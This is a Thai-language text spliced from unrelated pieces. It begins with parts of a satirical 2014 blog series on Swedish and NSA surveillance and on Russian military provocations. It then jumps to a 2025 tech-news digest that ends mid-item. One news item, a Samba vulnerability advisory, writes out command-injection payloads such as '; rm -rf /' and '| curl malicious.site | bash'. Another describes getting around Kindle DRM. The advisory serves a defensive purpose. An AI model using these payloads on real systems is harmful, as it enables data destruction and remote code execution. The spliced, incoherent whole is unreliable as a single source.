ตกลง สวีเดนเป็นนักล้วงตัวจริง ไม่ล้วงธรรมดา ล้วงแล้ว แล้วแหกปากบอกต่อไปทั่วอีกด้วย สวีเดนทำอย่างนี้ทำไม

โฆษก ของ FRA ยอมรับว่า NSA ของอเมริกา มี full access ผ่านได้ทุกด่าน เข้าได้ตลอดเวลาถึงศูนย์ข้อมูล ที่ฝ่ายข่าวกรองของสวีเดนได้มา เขาให้เหตุผลว่า ” เราคงไม่ทำอะไร โดยไม่ได้อะไรกลับมาหรอกนะ เมื่อเราสามารถหาข้อมูลในส่วนนี้ของโลกได้ เราก็เอาข้อมูลเหล่านี้ ไปแลกกับข้อมูลของส่วนอื่นของโลก ซึ่งยากสำหรับเราที่จะได้มา แต่มันเป็นข้อมูล ที่อาจมีความสำคัญอย่างยิ่งยวด สำหรับนโยบายต่างประเทศของเรา”

อย่างหนึ่งที่ สวีเดนได้รับมาจาก NSA ในการเป็นมิตรร่วมล้วง คือได้ โปรแกรมสุดยอดสำหรับการตามประกบเป้าหมาย ที่ต้องการจะล้วงลึกถึงสุดทางชื่อ Xkeyscore คือการตาม online ของทุกคนได้อย่างหมดจด อ้อ ไอ้เจ้านี่เอง ที่มันตาม ป่วนลุงนิทาน! โปรแกรมนี้ สามารถทำให้สวีเดน แฮ๊กเข้าไปในคอมพิวเตอร์ และสอดส่องดูกิจกรรมของประชาชน ของตนได้แบบไม่เหลือ อืม มันเลวได้เหมือนกันหมด นอกจากนี้ สวีเดนยังได้เข้าร่วม Project Quantum ที่ว่าเป็นการปฏิบัติการ hijacks ด้านคอมพิวเตอร์ที่สุดยอด
Edward Snowden พูดถึงฤทธิ์เดช ของ Xkeyscore ไว้ว่า “ผมแค่นั่งอยู่ที่โต๊ะทำงานของ ผม ผมก็สามารถ wiretap ใครก็ได้ จากคุณ หรือบัญชีของคุณ ไปจนถึง ผู้พิพากษาศาลสูง แม้กระทั่งประธานาธิบดี เพียงมีอีเมล์ ของคนนั้นเท่านั้น

ส่วน Quantum เขาว่า เป็นการใช้คลื่นวิทยุ กับอุปกรณ์ ที่ NSA สร้างขึ้นพิเศษ มีชื่อเรียกกันวงในว่า Cottonmouth I ก็ดูดข้อมูลจากคอมพิวเตอร์ได้หมด แถมส่งต่อไปตามสถานีใหญ่ของ NSA หรือส่งไปสถานีย่อยแบบพกพา portable ได้อีก

เรื่องการจารกรรมข้อมูลของรัสเซีย โดยสวีเดน เพื่ออเมริกาและพวก เป็นเรื่องที่น่ารังเกียจ และค้านกับการที่สวีเดนประกาศตัวเสมอว่า ฉันเป็นชาติเป็นกลาง มันเป็นกลางแบบที่เราคงนึกกันไม่ถึง โลกนี้ยังมีอะไรอีกแยะที่เรายังไม่รู้ ตราบเท่าที่ยังไม่เอากระป๋องสี่เหลี่ยมที่เขาครอบหัวเราออก

แล้วรัสเซียรู้เรื่องการล้วงตับ นี้ไหม รัสเซียคงยิ่งกว่ารู้ การเอาเครื่องบินรบ บินเฉี่ยวหัว และเอาเรือดำน้ำ โผล่ขึ้นไปตบหน้า แล้วหายตัวไป เบ็ดเสร็จประมาณ 40 ครั้ง ในรอบ 8 เดือน อย่างที่ครูอี ด่าหน้าเสาธงนั่นแหละ คงเป็นคำตอบของรัสเซียอย่างหนึ่ง ก็ไหนว่ามีมือยาวล้วงได้ล้ำลึกนัก ก็ผลัดกันล้วงบ้างแล้วกัน และเราก็ดูกันต่อไปว่า ที่สุดแล้ว ใครจะล้วงลึก หรือ ลวงลึก ได้กว่ากัน

สวัสดีครับ
คนเล่านิทาน
22 ธค. 2557

————————–———————–

บทส่งท้าย

เขียนเรื่องเขา ผลัดกันล้วงแล้ว อดนึกถึงเรื่องของเรา สมันน้อยไม่ได้ สมันน้อยเคยถูกล้วงบ้างไหม โดยใคร แล้วยังล้วงกันอยู่หรือเปล่า เคยคิดกันบ้างไหมครับ

ลองคิดเป็นตัวอย่างเล่นๆ ประมาณ ปี พ.ศ. 2533 แดนสมันน้อยประกาศเชิญชวนติดตั้ง โทรศัพท์ 3 ล้านเลขหมาย แบ่งเป็น กทม. 2 ล้านเลขหมาย ต่างจังหวัด 1 ล้านเลขหมาย ใครประมูลได้ ส่วนไหนบ้าง ใครเป็นคนได้งานวางไฟเบอร์ออพติก ใครรับช่วงต่อ ใครเป็นหัวเรือใหญ่ดูแลต่อรองเงื่อนไข ไปลองหาอ่านกันบ้างก็ดีนะครับ จะได้รู้หนา รู้บาง รู้ข้าง รู้ฝ่าย กันบ้าง

แล้วลองนึกถึงอีกเรื่อง เมื่อประมาณปี พ.ศ. 2535 แดนสมันน้อยให้สัมปทานดาวเทียม ใครเป็นคนได้สัมปทาน ทำอยู่กี่ปีแล้วดันขายไปให้ใคร ผิดเงื่อนไขสัมปทาน ผิดกฏหมายไหม มีใครคิดดำเนินการอะไรกันบ้างหรือเปล่า

ตอนนี้ ดาวเทียมของบริษัทที่ขายไป ก็ยังใช้ตำแหน่งวงโคจรประจำ ของสมันน้อยอยู่เหมือนเดิม แต่เจ้าของใหม่กลายเป็นลูกกระเป๋ง ของไอ้นักล่า

ลองต่อจิ๊กซอว์ เรื่องดาวเทียม โทรศัพท์ และสายไฟเบอร์ออพติก ดูเล่นกันหน่อย เห็นภาพอะไรไหมครับ นี่ยังไม่ได้เอาเรื่องโทรศัพท์เคลื่อนที่มารวมต่อเลยนะ

ถ้าเห็นภาพแล้ว จะทำอะไรก็ให้มันมิดชิด ระวังกันหน่อยนะครับ เดี๋ยวไอ้คนแอบอ่านแอบดูแอบฟังมันกุ้งยิงกินหมด ฮาออกไหมครับ ผมฮาไม่ออกหรอก ยิ่งเคยเห็นไอ้ลูกปิงปองยักษ์แว็บๆ ยิ่งคิดมาก ใครอยากเห็น นู่นครับ แถวเชียงใหม่ ออกนอกเมืองไปไม่ถึงชั่วโมงมีลูกเบ้อเริ่ม

ผลัดกันล้วง ตอนที่ 3
นิทานเรื่องจริง เรื่อง “ผลัดกันล้วง”
ตอนที่ 3

ประมาณเดือนพฤศจิกายน 2014 สถาบัน European Leadership Network (ELN) ได้ออกรายงานยาวประมาณ 20 หน้า ชื่อ Dangerous Brinkmanship: Close Military Encounters Between Russia and the West in 2014 บรรยายอย่างละเอียดถึงความประพฤติของรัสเซีย ซึ่งถ้าเปรียบกับนักเรียน ก็เป็นประเภทนักเรียนเกเร ที่ถูกครูใหญ่ดุประจาน ต่อหน้านักเรียนทั้งโรงเรียน ตอนเคารพธงชาติน่ะครับ

ครูอี (ELN) บอกว่า ตั้งแต่รัสเซียปฏิบัติการผนวกไครเมียเมื่อเดือนมีนาคมที่ผ่านมา ความตึงเครียดระหว่างตะวันตกกับรัสเซียเพิ่มจำนวน และเพิ่มความน่าระทึกใจขึ้นทุกที ครูอี นี่ท่าทางเข้มงวด แต่ขวัญอ่อนนะ ครูอีบอกว่า ผ่านมาแค่ 8 เดือน รัสเซียก่อเหตุ ประมาณ 40 ครั้ง มากกว่าปีที่แล้ว 3 เท่า แยกการก่อเหตุ เป็น 3 ประเภท คือ

– กึ่งปฏิบัติการประจำ (near routine)
– ปฏิบัติการยั่วยุ (provacative nature)
– ปฏิบัติการสร้างความเสียว (serious with evident risk of escalation)

ปฏิบัติการสร้างความเสียวมี 3 ครั้ง ( น้อยจังคุณพี่ พวกขวัญอ่อนนี่ น่าจะให้เสียวมากกว่านี้หน่อยนะ เป็นการฝึกหัดให้อดทน)

ครั้งที่ 1 เมื่อ 3 มีนาคม 2014 รายการบินเฉี่ยวหัวครั้งแรก ผู้ถูกเฉี่ยวคือ เครื่อง SAS ขวัญใจคุณพี่ปูติน สงสัยจะแอบชอบแอร์สาวชาวสแกน (ฮา) บินขึ้นจาก กรุงโคเปนฮาเกน ก็เกือบจ้ะเอ๋กับเครื่องลาดตระเวนของรัสเซีย ที่ไม่เปิดเรดาร์ แหมเวลาแอบดูสาว ใครเขาเปิดไฟกันบ้างเนอะ

ครั้งที่ 2 วันที่ 5 กันยายน 2014 นาย Eston Kohver เจ้าหน้าที่กำลังปฏิบัติการด้านความมั่นคงของเอสโทเนียอยู่ดีๆ ก็ ถูกสายลับรัสเซียดอดเข้ามาอุ้มตัวไปมอสโคว์ เหตุเกิดที่หน่วยปฏิบัติการ ประจำเขตแดนเอสโทเนียนั่นเอง ซึ่ง ครูอี ถือว่าเป็นเขตแดนของนาโต้

นาย Kohver ถูกรัสเซียกล่าวหาว่ากำลังทำการจารกรรม เหตุการณ์นี้ทำให้ระบบการติดต่อขัดข้องไปหมด ก็คือล่มนั่นแหละ (communication jamming) และเหตุการณ์นี้เกิดขึ้นทันทีหลังจากที่ นายโอบามา ไปเยี่ยมบริเวณดังกล่าว และให้ความยืนยันซ้ำถึงความปลอดภัยของบรรดารัฐ ที่อยู่ในบริเวณทะเลบอลติก เช่น เอสโทเนีย

แปลว่าการอุ้มเกิดขึ้น หลังจากนายโอบามาเพิ่งลุกกลับไป กลิ่นยังไม่ทันจางเลย ฮาจริง ครูอี นี่ก็พาซื่อ เล่าหมด

นี่มันรายงานเรื่องสำคัญ หรือบทตลกกันแน่ ผมชักงงว่า หยิบเอกสารผิดหรือเปล่า
ครั้งที่ 3 ระหว่างวันที่ 17-27 ตุลาคม 2014 มีการตามล่าหาเรือดำน้ำ บริเวณเกาะเล็กเกาะน้อย ในน่านน้ำสวีเดน หน้ากรุงสต๊อกโฮมนั่นเอง สวีเดนยัวะจัด บอกพร้อมที่จะใช้อาวุธจัดการกับเรือดำน้ำ… ถ้าหาเจอ ….แต่ปรากฎว่าหาไม่เจอ แต่แน่ใจว่าเป็นเรือดำน้ำรัสเซีย เอะ ไม่เจอแล้วแน่ใจได้ยังไง แน่นอน เมื่อหาไม่เจอ จับไม่ได้คามือ รัสเซียก็ปฏิเสธว่าไม่มีส่วนเกี่ยวข้องด้วย ใครจะไปรับกันง่ายๆ

สวีเดนบอกว่า ปฏิบัติการล่าเรือดำน้ำครั้งนี้ เป็นเรื่องใหญ่ รุนแรงที่สุดของสวีเดน นับแต่สงครามโลกครั้งที่ 2 เชียวนะ

เอ! สงสัยมันเป็นรายงานคนขวัญอ่อนจริงๆ แหละ ผมอ่านตอนแรกๆก็นึกว่า มีเรื่องน่าระทึกใจ นี่ขนาด 3 รายการรุนแรง มันยังอ่อนยวบอย่างนี้ ไอ้ที่เหลืออีก 30 กว่ารายการ ผมไม่บรรยายดีกว่านะครับ ส่วนใหญ่ก็เป็นเรื่อง เครืองบินรบของรัสเซีย บินเฉี่ยวไปโฉบมาไปทั่ว แถบบริเวณทะเลเหนือ ทะเลดำ ทะเลบอลติก ก็บ้านเขาอยู่ตรงนั้น ไม่บินแถวนั้นก็ประหลาดอยู่ ซึ่งพวกกินปลาดิบดองน้ำมันแถวนั้นคงขัดใจ ไม่ชอบให้เฉี่ยวหัว เฉี่ยวหู ผ้าเช็ด ตากยังไม่ทันแห้ง เฉี่ยวหัว ต้องเช็ดกันอีกแล้ว

แล้วรัสเซียทำอย่างนี้ทำไม ชอบถูกด่าหน้าเสาธงนักหรือ

ครูอี บอกว่า ด้านการทหารวิเคราะห์ว่า รัสเซียกำลังทดสอบสมรรถนะของนาโต้ ดูความพร้อม ระยะเวลาของปฏิกิริยา และอาวุธของกองกำลังนาโต้

เอ ครูอีครับ แต่สวีเดน กับฟินแลนด์ไม่ได้อยู่ในนาโต้นะครับ

ครูอีไม่ตอบ แต่แจงเพิ่มว่า น่าสังเกตว่า การยั่วยุของรัสเซียจะเกิดขึ้นสอดคล้องกับการแวะมาเยี่ยมของพวกลูกพี่เสมอเช่น เมื่อนายโอบามาแวะมาเยี่ยมยุโรปกลาง รัสเซียก็เฉียวหัวให้ดู พอนายช๊อกโกแลต ประธานาธิบดียูเครนไปเยี่ยมแคนาดา คุณพี่ปูตินก็ส่งเครื่องโฉบผ่านหัวที่แคนาดา ไปสวัสดีช๊อกโกแลต ส่วนกรณีเรือดำน้ำ ที่แวะไปประทับตราวีซ่าขาเข้าให้ตัวเองแถวสก๊อตแลนด์ ที่ชาวเกาะใหญ่เรียกระดมพล ก็เป็นช่วงประชุมสุดยอดของนาโต้ที่ Wales ผมว่า คุณพี่ปูติน เขาก็เลือกจังหวะทักทายได้เหมาะสม ตามมารยาทดีนี่นะ

แต่ครูอีไม่เห็นด้วย บอกว่า ถ้ารัสเซียทำตัวท้าทายอย่างนี้ไปเรื่อยๆ เหตุการณ์มันจะพัฒนาไปถึงจุดที่ เป็นการยากสำหรับแต่ละฝ่ายที่จะหยุด หรือควบคุม

ฮั่นแน่ ครูอี ขู่เป็นเหมือนกัน แต่เป็นการขูฝ้อเล็กๆ น่าเอ็นดู

แต่สุ้มเสียงของสวีเดนเอง ดูเหมือนจะคนละรสกับครูอี นาย Johan Wiktorin เจ้าหน้าที่ประจำ Swedish Royal Acadamy of War Science วิเคราะห์ว่า เรือดำน้ำรัสเซียน่า เข้ามา เพื่อมาสำรวจ และทำแผนที่บริเวณน่านน้ำแถวนั้น และเป็นไปได้ว่ารัสเซียเข้ามาติดตั้งเครื่องจารกรรมใว้ใต้ท้องน้ำด้วย และเป็นการทดสอบระบบการป้องกันความมั่นคงของสวีเดนด้วย เป็นการวิเคราะห์ที่ดูเหมือนสวีเดนกำลังคิด (หรือ รู้ ) ว่า รัสเซียน่าจะกำลังมีแผน คิดทำการใหญ่

สวัสดีครับ
คนเล่านิทาน
22 ธค. 2557

“ฝึกพนักงานให้รู้ทันฟิชชิ่ง — ทำไมการเทรนแบบเดิมถึงยังล้มเหลว?” — เจาะลึกงานวิจัยใหม่ที่ชี้ว่า phishing training แบบเดิมไม่ได้ผล และแนวทางใหม่ที่องค์กรควรพิจารณา

แม้หลายองค์กรจะลงทุนใน phishing training เพื่อป้องกันการโจมตีทางไซเบอร์ แต่ผลลัพธ์กลับไม่เป็นไปตามที่หวัง งานวิจัยจากมหาวิทยาลัยชิคาโกและ UC San Diego พบว่า training แบบเดิม เช่น annual training และ embedded training ไม่ได้ช่วยลดอัตราการคลิกลิงก์ฟิชชิ่งอย่างมีนัยสำคัญ

ปัญหาหลักคือพฤติกรรมของผู้ใช้ที่ไม่เปลี่ยน แม้จะรู้ว่าฟิชชิ่งอันตราย แต่เมื่อเจออีเมลจริงในช่วงงานยุ่ง ก็ยังคลิกโดยไม่คิด การฝึกแบบ “เช็คกล่อง” ไม่ช่วยให้เกิดพฤติกรรมอัตโนมัติที่ปลอดภัย

ผู้เชี่ยวชาญเสนอแนวทางใหม่ เช่น:
ใช้ gamification เพื่อเพิ่ม engagement
ให้รางวัลเล็ก ๆ เช่น gift card หรือกิจกรรมสนุก
สร้างวัฒนธรรมองค์กรที่ให้ความสำคัญกับความปลอดภัย
ฝึกให้ผู้ใช้มี “go-to action” เมื่อเจออีเมลน่าสงสัย เช่น รายงานผ่าน hotline
วิเคราะห์พฤติกรรมตามอุปกรณ์ เช่น ผู้ใช้ PC มีแนวโน้มคลิกมากกว่าผู้ใช้มือถือ

ข้อมูลในข่าว
งานวิจัยจากมหาวิทยาลัยชิคาโกและ UC San Diego วิเคราะห์พฤติกรรมพนักงานกว่า 20,000 คน
พบว่า annual training และ embedded training ไม่ช่วยลดอัตราการคลิกลิงก์ฟิชชิ่ง
ผู้ใช้มักไม่ engage กับ training และมี retention ต่ำ
พฤติกรรมผู้ใช้ไม่เปลี่ยน แม้จะรู้ว่าฟิชชิ่งอันตราย
ผู้ใช้ PC มีแนวโน้มคลิกลิงก์ฟิชชิ่งมากกว่าผู้ใช้มือถือ
การฝึกแบบเดิมเป็น “เช็คกล่อง” ไม่สร้างพฤติกรรมอัตโนมัติ
ผู้เชี่ยวชาญเสนอให้ใช้ gamification และ incentive เพื่อเพิ่ม engagement
ควรมี “go-to action” ที่ชัดเจน เช่น hotline หรือปุ่มรายงาน
วัฒนธรรมองค์กรต้องสนับสนุนความปลอดภัย ไม่ใช่แค่การเทรน
การวัดผลควรดูจากอัตราการคลิกจริงและการรายงาน ไม่ใช่แค่ completion rate

https://www.csoonline.com/article/4071289/what-to-consider-to-make-your-enterprise-phishing-training-effective.html

“Unkey ลาออกจาก Serverless” — เมื่อความเร็วและความเรียบง่ายสำคัญกว่าแนวคิดไร้เซิร์ฟเวอร์

หลังจากใช้ Cloudflare Workers มานานกว่า 2 ปี Unkey ตัดสินใจย้ายระบบ API authentication ทั้งหมดไปใช้ Go servers แบบ stateful โดยให้เหตุผลว่า serverless แม้จะดูดีในแง่การกระจายโหลดและต้นทุน แต่กลับสร้าง “ภาษีความซับซ้อน” ที่ทำให้ทีมต้องสร้าง workaround มากมายเพื่อให้ระบบทำงานได้เร็วและเสถียร

ปัญหาหลักคือ latency ที่ไม่สามารถลดต่ำกว่า 30ms ได้ แม้จะใช้ cache หลายชั้น รวมถึงการต้องพึ่งพา SaaS หลายตัวเพื่อแก้ปัญหาที่ serverless สร้างขึ้น เช่น Redis, Queues, Durable Objects และ Logstreams ซึ่งเพิ่มทั้งความซับซ้อนและจุดล้มเหลว

เมื่อย้ายมาใช้ Go servers ทีมสามารถลด latency ได้ถึง 6 เท่า และตัดทิ้งระบบ pipeline ที่ซับซ้อน เช่น chproxy และ logdrain workers โดยใช้การ batch ข้อมูลใน memory แบบง่าย ๆ แทน

นอกจากนี้ยังได้ประโยชน์ด้าน self-hosting, การพัฒนาในเครื่อง, และการหลุดพ้นจากข้อจำกัดของ Cloudflare runtime โดยยังคงใช้ AWS Global Accelerator และ Fargate เพื่อรักษาความสามารถในการกระจายโหลดและ autoscaling

ข้อมูลในข่าว
Unkey ย้ายจาก Cloudflare Workers ไปใช้ Go servers แบบ stateful
ลด latency ได้ถึง 6 เท่า จากเดิมที่ติดอยู่ที่ 30ms+
ปัญหาหลักคือการ cache ที่ต้องพึ่ง network request เสมอ
ใช้ cache แบบ SWR หลายชั้นแต่ยังไม่เร็วพอ
ต้องใช้ SaaS หลายตัวเพื่อแก้ปัญหา serverless เช่น Redis, Queues, Durable Objects
pipeline สำหรับ analytics และ logs มีความซับซ้อนสูง
ใช้ chproxy เพื่อ buffer event ก่อนส่งเข้า ClickHouse
ใช้ logdrain worker เพื่อจัดการ metrics และ logs ก่อนส่งเข้า Axiom
เมื่อย้ายมา Go servers สามารถ batch ข้อมูลใน memory ได้โดยตรง
ลดความซับซ้อนของระบบจาก distributed system เหลือแค่ application เดียว
รองรับ self-hosting ด้วยคำสั่งง่าย ๆ เช่น docker run -p 8080:8080 unkey/api
พัฒนาและ debug ในเครื่องได้ง่ายขึ้น
หลุดพ้นจากข้อจำกัดของ Cloudflare runtime
ใช้ AWS Global Accelerator และ Fargate เพื่อรักษาความสามารถในการกระจายโหลด
เตรียมเปิดตัว “Unkey Deploy” แพลตฟอร์มสำหรับรัน Unkey ได้ทุกที่

https://www.unkey.com/blog/serverless-exit

“เมื่อ Kindle ไม่ให้ดาวน์โหลดหนังสือที่ซื้อ — นักพัฒนาแฮกระบบเว็บเพื่ออ่านในแอปที่ตัวเองเลือก”

Pixelmelt นักพัฒนาสายแฮกเกอร์สายเทคนิค ได้เขียนบล็อกเล่าประสบการณ์สุดหัวร้อนหลังซื้อ eBook จาก Amazon แล้วพบว่าไม่สามารถอ่านผ่านแอปอื่นได้เลย Kindle Android app ก็ดันแครชซ้ำ ๆ ส่วน Kindle Web Reader ก็ไม่ให้ดาวน์โหลดไฟล์หรือ export ไปยัง Calibre ซึ่งเป็นแอปจัดการหนังสือยอดนิยมของสาย eBook

เขาจึงตัดสินใจ “reverse-engineer” ระบบ obfuscation ของ Kindle Web Reader เพื่อดึงข้อมูลหนังสือออกมาอ่านในแอปที่ตัวเองเลือก โดยพบว่า Amazon ใช้เทคนิคซับซ้อนหลายชั้นเพื่อป้องกันการเข้าถึงเนื้อหาจริง เช่น:
การแปลงตัวอักษรเป็น glyph ID แบบสุ่ม
การเปลี่ยน mapping ทุก 5 หน้า
การฝัง path SVG ที่ทำให้ parser ภายนอกอ่านผิด
การใช้หลาย font variant และ ligature
การจำกัด API ให้โหลดได้ทีละ 5 หน้าเท่านั้น

Pixelmelt ลองใช้ OCR แต่ล้มเหลว จึงหันมาใช้เทคนิค “pixel-perfect matching” โดยเรนเดอร์ glyph เป็นภาพ แล้วใช้ perceptual hash และ SSIM เพื่อจับคู่กับตัวอักษรจากฟอนต์ Bookerly ที่ Amazon ใช้

ผลลัพธ์คือ เขาสามารถถอดรหัส glyph ทั้งหมด 361 แบบจากหนังสือ 920 หน้า และสร้างไฟล์ EPUB ที่มีการจัดรูปแบบเหมือนต้นฉบับแทบทุกประการ

เขาย้ำว่าเป้าหมายไม่ใช่การละเมิดลิขสิทธิ์ แต่เพื่ออ่านหนังสือที่ “ซื้อมาแล้ว” ในแอปที่ตัวเองเลือก และเพื่อเรียนรู้เทคนิคด้าน SVG, hashing และ font metrics

ข้อมูลในข่าว
นักพัฒนาไม่สามารถอ่าน eBook ที่ซื้อจาก Amazon ในแอปอื่นได้
Kindle Android app แครช และ Web Reader ไม่ให้ดาวน์โหลดหรือ export
Amazon ใช้ระบบ obfuscation หลายชั้นเพื่อป้องกันการเข้าถึงเนื้อหา
ตัวอักษรถูกแปลงเป็น glyph ID แบบสุ่ม และเปลี่ยนทุก 5 หน้า
API จำกัดให้โหลดได้ทีละ 5 หน้า
glyphs ถูกฝังด้วย path SVG ที่ทำให้ parser อ่านผิด
ใช้หลาย font variant เช่น bold, italic, ligature
OCR ล้มเหลวในการจับคู่ glyph กับตัวอักษร
ใช้ perceptual hash และ SSIM เพื่อจับคู่ glyph กับฟอนต์ Bookerly
ถอดรหัส glyph ได้ครบ 361 แบบจากหนังสือ 920 หน้า
สร้างไฟล์ EPUB ที่มีการจัดรูปแบบเหมือนต้นฉบับ
ย้ำว่าเป้าหมายคือการอ่านหนังสือที่ซื้อมาแล้ว ไม่ใช่ละเมิดลิขสิทธิ์
ได้เรียนรู้เทคนิคด้าน SVG rendering, hashing และ font metrics

https://blog.pixelmelt.dev/kindle-web-drm/

“PipeWire 1.6 มาแล้ว!” — รองรับ Bluetooth ASHA สำหรับเครื่องช่วยฟัง พร้อมฟีเจอร์ใหม่เพียบสำหรับสายเสียงและวิดีโอบน Linux

PipeWire 1.6 ซึ่งเป็นระบบจัดการเสียงและวิดีโอแบบ low-latency บน Linux ได้เข้าสู่ช่วงพัฒนาแล้ว โดยเวอร์ชันใหม่นี้มาพร้อมฟีเจอร์เด่นคือการรองรับ Bluetooth ASHA (Audio Streaming for Hearing Aid) ซึ่งช่วยให้ผู้ใช้เครื่องช่วยฟังสามารถเชื่อมต่อกับระบบเสียงของ Linux ได้โดยตรงผ่าน Bluetooth

นอกจากนี้ยังมีการปรับปรุงหลายด้าน เช่น:
รองรับ MIDI 2.0 clip
เพิ่มตัวช่วยจัดการ timeout แบบใหม่
เพิ่มตัวอย่าง config สำหรับ Dolby Surround และ Dolby Pro Logic II
รองรับหูฟัง Razer BlackShark v3 และลำโพง Logitech Z407
ปรับปรุงการตั้งค่า ALSA node ให้ทำงานร่วมกับ Firewire driver ได้ดีขึ้น
เพิ่มฟีเจอร์ telephony และแก้ปัญหา packet loss สำหรับ Bluetooth codecs
รองรับการอ่านตำแหน่ง channel จาก HDMI ELD
เพิ่ม benchmark สำหรับ AEC แบบ offline
รองรับ H.265 เป็น video format
เพิ่ม ONNX filter และ FFmpeg avfilter plugin
ปรับปรุงการเล่น DSD ด้วย pw-cat
รองรับ metadata และ latency ใน filter-graph
เพิ่มความสามารถให้ plugin filter-graph รับได้ถึง 8 channel

PipeWire 1.6 ยังมีการปรับปรุงด้านความปลอดภัย เช่น การ rewrite parser ของ control stream ให้ปลอดภัยจาก concurrent update และการ lock loop ด้วย priority inversion

ผู้ใช้สามารถดาวน์โหลด Release Candidate ได้จาก GitLab ของโครงการ แต่ควรทราบว่านี่เป็นเวอร์ชัน pre-release ที่ยังไม่เหมาะกับการใช้งานจริงในระบบ production

ข้อมูลในข่าว
PipeWire 1.6 รองรับ Bluetooth ASHA สำหรับเครื่องช่วยฟัง
เพิ่ม MIDI 2.0 clip support และ timer-queue helper
มี config ตัวอย่างสำหรับ Dolby Surround และ Pro Logic II
รองรับอุปกรณ์ใหม่ เช่น Razer BlackShark v3 และ Logitech Z407
ปรับปรุง ALSA node สำหรับ Firewire driver
เพิ่มฟีเจอร์ telephony และแก้ packet loss สำหรับ Bluetooth codecs
รองรับ HDMI ELD, offline AEC benchmark และ H.265 video format
เพิ่ม ONNX filter และ FFmpeg plugin
ปรับปรุง DSD playback, metadata, latency และ channel support
ปรับ parser ให้ปลอดภัยจาก concurrent update
รองรับ plugin filter-graph สูงสุด 8 channel
Release Candidate พร้อมดาวน์โหลดจาก GitLab

https://9to5linux.com/pipewire-1-6-promises-bluetooth-audio-streaming-for-hearing-aid-support

“ช่องโหว่ CVE-2025-10230 บน Samba AD DC” — เสี่ยงถูกสั่งรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน

ทีมพัฒนา Samba ได้ออกประกาศเตือนภัยร้ายแรงเกี่ยวกับช่องโหว่ CVE-2025-10230 ซึ่งมีคะแนน CVSS เต็ม 10.0 โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีสามารถสั่งรันคำสั่งบนระบบปฏิบัติการได้จากระยะไกลโดยไม่ต้องยืนยันตัวตน หากระบบนั้นเปิดใช้งาน WINS server และมีการตั้งค่า “wins hook” ในไฟล์ smb.conf

ช่องโหว่นี้เกิดจากการที่ Samba ไม่ได้ตรวจสอบข้อมูลที่ส่งเข้ามาอย่างเพียงพอ เมื่อมีการลงทะเบียนหรือเปลี่ยนชื่อ NetBIOS ผ่าน WINS server ระบบจะเรียกใช้โปรแกรมที่กำหนดไว้ใน “wins hook” โดยนำข้อมูลที่ผู้ใช้ส่งมาไปใส่ในคำสั่ง shell โดยตรง ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash

เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที

ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ

ทีม Samba แนะนำให้ผู้ดูแลระบบ:
ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf
ปิดการใช้งาน WINS server (wins support = no)
อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9

ข้อมูลในข่าว
ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม
เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell
ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน
มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook”
WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ
NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้
Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ
วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no)
เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9
“wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต

https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/

“Cisco อุดช่องโหว่ CVE-2025-20350 บน IP Phone” — ป้องกันการรีโหลดเครื่องจากการโจมตี DoS ผ่าน HTTP

Cisco ได้ออกแพตช์เพื่อแก้ไขช่องโหว่ความรุนแรงสูง CVE-2025-20350 ซึ่งส่งผลกระทบต่ออุปกรณ์ Cisco Desk Phone และ IP Phone หลายรุ่น เช่น 9800, 7800, 8800 และ 8875 ที่ใช้ Cisco SIP Software โดยช่องโหว่นี้เปิดทางให้ผู้โจมตีที่ไม่ได้รับการยืนยันตัวตนสามารถส่งข้อมูล HTTP ที่ถูกปรับแต่งมาอย่างเจาะจงเพื่อทำให้เครื่องรีโหลดและเกิดภาวะ Denial-of-Service (DoS)

ช่องโหว่นี้เกิดจาก buffer overflow ใน web interface ของอุปกรณ์ ซึ่งจะทำงานได้ก็ต่อเมื่อเปิดใช้งาน Web Access และอุปกรณ์ได้ลงทะเบียนกับ Cisco Unified Communications Manager แล้ว โดยปกติ Web Access จะถูกปิดไว้เป็นค่าเริ่มต้น ทำให้ลดความเสี่ยงในระบบที่ไม่ได้เปิดใช้งานฟีเจอร์นี้

Cisco ยังเปิดเผยช่องโหว่อีกตัวคือ CVE-2025-20351 ซึ่งมีความรุนแรงระดับกลาง (CVSS 6.1) ที่เกี่ยวข้องกับการตรวจสอบ input ไม่เพียงพอใน web UI ทำให้ผู้โจมตีสามารถหลอกให้ผู้ใช้คลิกลิงก์ที่ถูกปรับแต่งเพื่อรัน JavaScript ในบริบทของเบราว์เซอร์

ไม่มีวิธีแก้ไขชั่วคราวสำหรับช่องโหว่ทั้งสองนอกจากการปิด Web Access หรืออัปเดต firmware เป็นเวอร์ชันที่ปลอดภัย

ข้อมูลในข่าว
Cisco แก้ไขช่องโหว่ CVE-2025-20350 ที่ทำให้เกิด DoS บนอุปกรณ์ IP Phone
ช่องโหว่เกิดจาก buffer overflow เมื่อประมวลผล HTTP input
